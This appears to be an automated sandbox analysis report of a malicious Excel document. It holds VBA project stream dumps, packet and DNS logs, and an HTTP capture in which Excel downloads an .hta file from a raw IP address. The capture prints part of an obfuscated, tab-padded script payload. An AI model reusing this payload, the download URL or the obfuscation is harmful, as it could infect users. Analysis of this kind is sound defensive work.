                                                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 ed 81 57 15 a8 2f 0b 6d 0c 7e ff d8 74 42 97 57 1c 84 0e 4c e0 c7 ff 60 25 1e c7 05 45 1e e0 6a e7 1f 4f 7d a3 27 0c b3 39 0f 0c fe bb 12 10 7a e1 00 02 00 b0 04 c1 00 02 00 2b bb e2 00 00 00 5c 00 70 00 ae 24 87 fc 5c dc c0 0b 2c 06 62 e4 f1 10 bf de 75 7e 44 b3 d1 ce 5e 88 01 7b ed 90 1f 93
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                CLSID:
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:517
                                                Entropy:5.254364355809256
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { 5 A 4 3 9 5 4 8 - D A 3 A - 4 5 4 1 - 8 1 6 8 - D F 2 B D A B 8 D 0 5 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 9 C B 2 3 B 1 2 7 B 1 2 7 B 1 2
                                                Data Raw:49 44 3d 22 7b 35 41 34 33 39 35 34 38 2d 44 41 33 41 2d 34 35 34 31 2d 38 31 36 38 2d 44 46 32 42 44 41 42 38 44 30 35 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                CLSID:
                                                File Type:data
                                                Stream Size:104
                                                Entropy:3.0488640812019017
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                CLSID:
                                                File Type:data
                                                Stream Size:2644
                                                Entropy:3.99712025135722
                                                Base64 Encoded:False
                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                CLSID:
                                                File Type:data
                                                Stream Size:553
                                                Entropy:6.3759657298043875
                                                Base64 Encoded:True
                                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 5d af 99 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 14, 2025 19:15:18.251879930 CET5059353192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:18.258322954 CET53505931.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:18.258404016 CET5059353192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:18.266910076 CET53505931.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:18.764940023 CET5059353192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:18.769982100 CET53505931.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:18.770067930 CET5059353192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:19.657927036 CET5852253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:19.662714005 CET53585221.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:19.662785053 CET5852253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:19.675574064 CET5852253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:19.680397987 CET53585221.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:20.126300097 CET53585221.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:20.217701912 CET5852253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:20.223263025 CET53585221.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:20.223331928 CET5852253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:57.895621061 CET6330253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:57.901873112 CET53633021.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:57.902034044 CET6330253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:57.907368898 CET53633021.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:58.361717939 CET6330253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:15:58.367242098 CET53633021.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:58.367341995 CET6330253192.168.2.241.1.1.1
                                                Jan 14, 2025 19:16:07.736468077 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:07.736510038 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:07.736646891 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:07.737649918 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:07.737662077 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:08.668973923 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:08.669146061 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.670403004 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.670413017 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:08.671325922 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:08.671396017 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.675584078 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.675663948 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:08.675728083 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.675734043 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:08.675781012 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.685259104 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:08.731338978 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:09.220877886 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:09.220951080 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:09.220964909 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:09.221026897 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:09.226067066 CET63305443192.168.2.2414.103.79.10
                                                Jan 14, 2025 19:16:09.226088047 CET4436330514.103.79.10192.168.2.24
                                                Jan 14, 2025 19:16:09.229469061 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.234307051 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.234430075 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.237879038 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.242705107 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.727761030 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.727822065 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.727876902 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.727886915 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.727912903 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.727919102 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.727919102 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.727953911 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.727962971 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.727991104 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.728024960 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.728040934 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.728060007 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.728065014 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.728095055 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.728131056 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.728141069 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.728168011 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.732949972 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.732969999 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.733011961 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.733129025 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.733140945 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.733169079 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.733179092 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.733210087 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.814639091 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814654112 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814666986 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814687967 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814723015 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.814749002 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.814769030 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814788103 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814800978 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814811945 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.814831018 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.814856052 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.815548897 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815572023 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815582037 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815625906 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.815942049 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815962076 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815973997 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815984964 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.815989971 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.815999031 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.816004992 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.816026926 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.816051006 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.816823006 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.816833973 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.816843987 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.816854000 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.816867113 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.816869974 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.816894054 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.816905022 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.817691088 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.817702055 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.817712069 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.817723036 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.817739964 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.817764997 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.819700956 CET8063306131.226.2.34192.168.2.24
                                                Jan 14, 2025 19:16:09.819792032 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.881759882 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:09.881794930 CET6330680192.168.2.24131.226.2.34
                                                Jan 14, 2025 19:16:24.184494972 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:24.184536934 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:24.185198069 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:24.185678959 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:24.185688972 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:24.850929976 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:24.851052999 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:24.853190899 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:24.853219986 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:24.853614092 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:24.854877949 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:24.899327993 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:25.039802074 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:25.039906025 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:25.039978981 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:25.040818930 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:25.040844917 CET4436330913.107.253.45192.168.2.24
                                                Jan 14, 2025 19:16:25.040859938 CET63309443192.168.2.2413.107.253.45
                                                Jan 14, 2025 19:16:25.040864944 CET4436330913.107.253.45192.168.2.24
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 14, 2025 19:15:18.251446962 CET53507351.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:19.657555103 CET53507351.1.1.1192.168.2.24
                                                Jan 14, 2025 19:15:57.894982100 CET53507351.1.1.1192.168.2.24
                                                Jan 14, 2025 19:16:07.569423914 CET5073553192.168.2.241.1.1.1
                                                Jan 14, 2025 19:16:07.735384941 CET53507351.1.1.1192.168.2.24
                                                Jan 14, 2025 19:16:24.175870895 CET5073553192.168.2.241.1.1.1
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 14, 2025 19:16:07.569423914 CET192.168.2.241.1.1.10x3d4aStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                                                Jan 14, 2025 19:16:24.175870895 CET192.168.2.241.1.1.10x7ecaStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 14, 2025 19:16:07.735384941 CET1.1.1.1192.168.2.240x3d4aNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                                                Jan 14, 2025 19:16:24.183753967 CET1.1.1.1192.168.2.240x7ecaNo error (0)otelrules.svc.static.microsoftotelrules.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                Jan 14, 2025 19:16:24.183753967 CET1.1.1.1192.168.2.240x7ecaNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                Jan 14, 2025 19:16:24.183753967 CET1.1.1.1192.168.2.240x7ecaNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Jan 14, 2025 19:16:24.183753967 CET1.1.1.1192.168.2.240x7ecaNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                • s.deemos.com
                                                • otelrules.svc.static.microsoft
                                                • 131.226.2.34
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.2463306131.226.2.34808548C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                TimestampBytes transferredDirectionData
                                                Jan 14, 2025 19:16:09.237879038 CET266OUTGET /xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta HTTP/1.1
                                                Accept: */*
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Connection: Keep-Alive
                                                Host: 131.226.2.34
                                                Jan 14, 2025 19:16:09.727761030 CET1236INHTTP/1.1 200 OK
                                                Date: Tue, 14 Jan 2025 18:16:09 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                Last-Modified: Tue, 14 Jan 2025 07:35:34 GMT
                                                ETag: "bac5-62ba59b3de18c"
                                                Accept-Ranges: bytes
                                                Content-Length: 47813
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/hta
                                                Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 33 35 25 33 32 25 33 31 25 33 36 25 33 34 25 33 34 25 33 39 25 33 36 25 33 30 25 33 32 25 36 32 25 36 34 25 33 37 25 33 30 25 36 31 25 33 36 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                                                Data Ascii: <script>...(function() { var d = unescape("%35%32%31%36%34%34%39%36%30%32%62%64%37%30%61%36%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%57%27%56%2d%54%38%63%38%3d%54%49%21%65%58%49%5c%38%72%5a%26%37%27%56%2d%34%38%65%22%0a%28%4d%31%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
                                                Jan 14, 2025 19:16:09.727822065 CET224INData Raw: 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30
                                                Data Ascii: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                                                Jan 14, 2025 19:16:09.727876902 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 35 39 25 32 37 25 33 30 25 33 63 25 34 38 25 35 62 25 32 62 25 33 61 25 35 61 25 33 63 25 32 36 25 33 62 25 35 36 25 32 36 25 34 61 25 32 62 25 35 34 25 33 33 25 35 30 25 33 37 25 33 65 25
                                                Data Ascii: %09%09%09%09%09%09%59%27%30%3c%48%5b%2b%3a%5a%3c%26%3b%56%26%4a%2b%54%33%50%37%3e%2e%35%5e%51%37%34%51%4a%4d%5a%3e%54%26%30%4d%35%46%54%5e%37%4e%58%39%38%28%46%32%4a%2c%2e%56%49%37%39%5c%2a%37%5a%25%36%50%59%2b%30%4f%38%4a%29%34%2e%4f%4b%4b%53
                                                Jan 14, 2025 19:16:09.727912903 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                                                Jan 14, 2025 19:16:09.727953911 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                                                Jan 14, 2025 19:16:09.727991104 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                                                Jan 14, 2025 19:16:09.728024960 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                                                Jan 14, 2025 19:16:09.728060007 CET552INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 34 37 25 35 36 25 32 39 25 32 35 25 33 38 25 32 39 25 33 33 25 32 36 25 34 65 25 34 39 25 34 37 25 33 38 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%47%56%29%25%38%29%33%26%4e%49%47%38%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                                                Jan 14, 2025 19:16:09.728095055 CET1236INData Raw: 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25 30 39 25
                                                Data Ascii: %09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%6b%09%09%09%09%09%09%09%09%09
